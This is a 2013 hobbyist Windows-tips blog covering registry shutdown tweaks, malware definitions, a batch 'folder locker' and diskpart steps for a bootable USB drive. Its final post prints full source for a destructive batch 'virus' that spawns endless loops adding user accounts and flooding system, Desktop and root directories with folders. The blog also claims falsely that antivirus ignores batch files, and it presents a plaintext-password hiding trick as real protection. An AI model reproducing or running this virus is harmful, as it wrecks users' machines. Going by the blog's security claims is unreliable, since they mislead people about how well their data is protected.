Sunday, 28 April 2013

Auto End Tasks to Enable a Proper Shutdown

We all know that everyone wants that their computer shutdown fast.

But it can't shutdown sometime shows eroor that some(three,four.........whatever) program need to be close.

so they(programs) took too much time to end.after that computer is shuted down.



Today i m gonna how u how enable a proper shutdown. This problem arise mostly to everone's computer in daily life.


So it take too much time to be shuted down It is so clumsy,and no one can  like that computer take too much time to shutdown.
Some times people angred and break their pc in anger.


Their is registry trick which i gonna to tell u which solve ur problem.

Example:-

Go to that link on registry modify/ dword value.if not exist create it.  After that ur computer shut down fast.

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
"ClearPageFileAtShutdown"=dword:00000001


[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"AutoEndTasks"="1"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]
"WaitToKillServiceTimeout"="1000"






Tuesday, 16 April 2013

What is a trojan/worm/virus/logic bomb?

Trojan:-

Remember the Trojan Horse? Bad guys hide inside it until they could get into the city to do their evil deed.

 A trojan computer program is similar. It is a program which does an unauthorized function, hidden  inside an authorized program.




 It does something other than what it claims to do, usually something     malicious (although not necessarily!), and it is intended by the author to do whatever it does. 


If it's not intentional, its called a 'bug' or, in some cases, a feature :) Some virus scanning programs detect some trojans. Some virus scanning programs don't detect any trojans. No virus scanners detect all trojans.


Virus:-

     A virus is an independent program which reproduces itself.

 It may attach to other programs, it may create copies of itself (as in
 companion viruses).


 It may damage or corrupt data, change data, or degrade the performance of your system by utilizing resources such as memory or disk space. 




Some virus scanners detect some viruses. No virus scanners detect all viruses.
 No virus scanner can protect against "any and all viruses, known and unknown, now and forevermore".



Worm:-

 Made famous by Robert Morris, Jr. ,

Worms are programs which reproduce by copying themselves over and over, system to system, using up resources and sometimes slowing down the systems. 

They are self contained and use the networks to spread, in much the same way viruses use files to spread. 




Some people say the solution to viruses and worms is to just not have any files or networks. They are probably correct.


Logic Bomb: -

     Code which will trigger a particular form of 'attack' when a designated condition is met.


 For instance, a logic bomb could delete  all files on Dec. 5th. Unlike  a virus, a logic bomb does not make copies of itself.

Fun with Windows Registry

Custmize ur system tray:-

We all  know that registry in windows is work like a database or policy manager.

So we can play with it .-by custmizing it.

Follow the steps:-

  1. Open Run
  2. Type Regedit
  3. Goto HKEY_CURRENT_USER\CONTROL PANEL\INTERNATIONAL
  4. Add two new String values, "s1159" and "s2359"
  5. Right click the new value name and modify. Enter anything you like up to 8 characters. 

    If you enter two different values when modifying, you can have the system tray display the two different values in the AM and PM. 


    I modify it to     1. am=Narender  2.pm  =  Rathor

    SEE here changes :-



     



Friday, 5 April 2013

Keep ur files private/protected/hided -without software

Hello frndz, tonight i m gonna teach u how to keep ur information private from others.

In this tutorial i m gonna show u the how we could do awesome things with Batch Programming.

All we know that there is many software on web, which come with file protection & other facilities.

                                                                                               But they come with trial period. so we can't  use them for longer time.

But i m here to  give u code give u to facility to hide/ protected. without third party software,with help of batch programming.


Example:-

if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
 if NOT EXIST Locker goto MDLOCKER
 :CONFIRM
 echo Are you sure u want to Lock the folder(Y/N)
 set/p "cho=>"
 if %cho%==Y goto LOCK
 if %cho%==y goto LOCK
 if %cho%==n goto END
 if %cho%==N goto END
 echo Invalid choice.
 goto CONFIRM
 :LOCK
 ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
 attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
 echo Folder locked
 goto End
 :UNLOCK
 echo Enter password to Unlock folder
 set/p "pass=>"
 if NOT %pass%==type your password here goto FAIL
 attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
 ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
 echo Folder Unlocked successfully
 goto End
 :FAIL
 echo Invalid password
 goto end
 :MDLOCKER
 md Locker


Just type this code in notepad  and save it as a  Anyname.bat  

here  .bat is batch extension ,anyname=name u want to save.

After doing this u see a batch file with named u give it.

when double click on  it u see a folder named as locker come out.  the files u want to save put in it.
it ask u to save files or not press Y, to yes, n to no.
again doble click on it u see folder named locker is hided. can't show even u click on file properties and click show hidden file. so here we have advantage. no one can see ur information. when U click on the  batch file it again come out.

if u like the trick  please subscribe/like us on faceboook/or submit ur mail -u will get the updates via mail.

Thursday, 4 April 2013

How to create bootable pendrive on dos

How to create bootable pendrive on dos:-


Some times we have not the bottble cd's of windows/linux etc. so at this situation what we do. I m gonna tell u the easy way by which u can install windows with a pen drive.  Here we have some procedure to do it with    command prompt.


No other third party sofware needed to do this.Just follow the procedure & here we go-

Go to startup Type cmd in serch box.when it appear.
Right click on it.select Run as administrator.




Example:-

cmd run at administrator
diskpart
list disk
select disk 1
clean
create partition primary
select partition 1
active
format fs=ntfs quick
assign
exit
d:
cd win7
cd boot
BOOTSECT.EXE/NT60 PENDRIVE name such as g:
exit



  • Just Copy whole content(windows in stallation file) to pendrive.
  • Now u have done with it.
  • When system Reboot press F12,F2 To go to boot setup menu .Diffrent Machine have  diffrent key for it.
  • Set ur bot procedure From Hardisk/CD Rom  TO  external pendrive.
  • SAve it here we go .plugin pendrive to the system. It automatically initate window installation.


If u like the trick subscribe/commant/like us on facebook.

Tuesday, 2 April 2013

Batch programming-trending world wide

Batch programming-trending world wide:-


Hello  Frndz i m here to talk about Batch programing. Batch files are those  which use in system file.

So no one antivirus recognize them.so in case of   windows  virus are  mainly  have  Extension (.EXE,.COM,.BAT) these files are mainly windows file so a sytem can't take them as a threat.



  • So virus maker make viruses on  these extensions.


Here an example of viruse which is destroy a whole computer.so use it smartly & only on education purpose.


Example:-


@ECHO OFF
@ECHO Rathor Creation
@ECHO MAIN BAT RUNNING
 GOTO start



:start



 @ECHO SET magic2=1 >> bat6.bat

 @ECHO GOTO flood5 >> bat6.bat

 @ECHO :flood5 >> bat6.bat

 @ECHO SET /a magic2=%%magic2%%+1 >> bat6.bat

 @ECHO NET USER magic2%%magic2%% /add >> bat6.bat

 @ECHO GOTO flood5 >> bat6.bat

  START /MIN bat6.bat



GOTO bat5


:bat5



 @ECHO CD %%ProgramFiles%%\ >> bat5.bat

 @ECHO SET pogo=1 >> bat5.bat

 @ECHO GOTO flood4 >> bat5.bat

 @ECHO :flood4 >> bat5.bat

 @ECHO MKDIR pogo%%pogo%% >> bat5.bat

 @ECHO SET /a pogo=%%pogo%%+1 >> bat5.bat

 @ECHO GOTO flood4 >> bat5.bat

  START /MIN bat5.bat

 GOTO bat4


:bat4


@ECHO CD %%SystemRoot%%\ >> bat4.bat

@ECHO SET hat=1 >> bat4.bat

@ECHO GOTO flood3 >> bat4.bat

@ECHO :flood3 >> bat4.bat

@ECHO MKDIR hat%%hat%% >> bat4.bat

@ECHO SET /a hat=%%hat%%+1 >> bat4.bat

@ECHO GOTO flood3 >> bat4.bat

 START /MIN bat4.bat



GOTO bat3


:bat3




@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat

@ECHO SET chart=1 >> bat3.bat

@ECHO GOTO flood2 >> bat3.bat

@ECHO :flood2 >> bat3.bat

@ECHO MKDIR chart%%chart%% >> bat3.bat

@ECHO SET /a chart=%%chart%%+1 >> bat3.bat

@ECHO GOTO flood2 >> bat3.bat

 START /MIN bat3.bat



 GOTO bat2


:bat2



@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat

@ECHO SET gamer=1 >> bat2.bat

@ECHO GOTO flood >> bat2.bat

@ECHO :flood >> bat2.bat

@ECHO MKDIR gamer%%gamer%% >> bat2.bat

@ECHO SET /a gamer=%%gamer%%+1 >> bat2.bat

@ECHO GOTO flood >> bat2.bat

 START /MIN bat2.bat



GOTO original


:original

CD %HomeDrive%\

SET Rathor=1



GOTO flood1



:flood1



MKDIR Rathor%Rathor%

SET /a Rathor=%sRathor%+1

GOTO flood1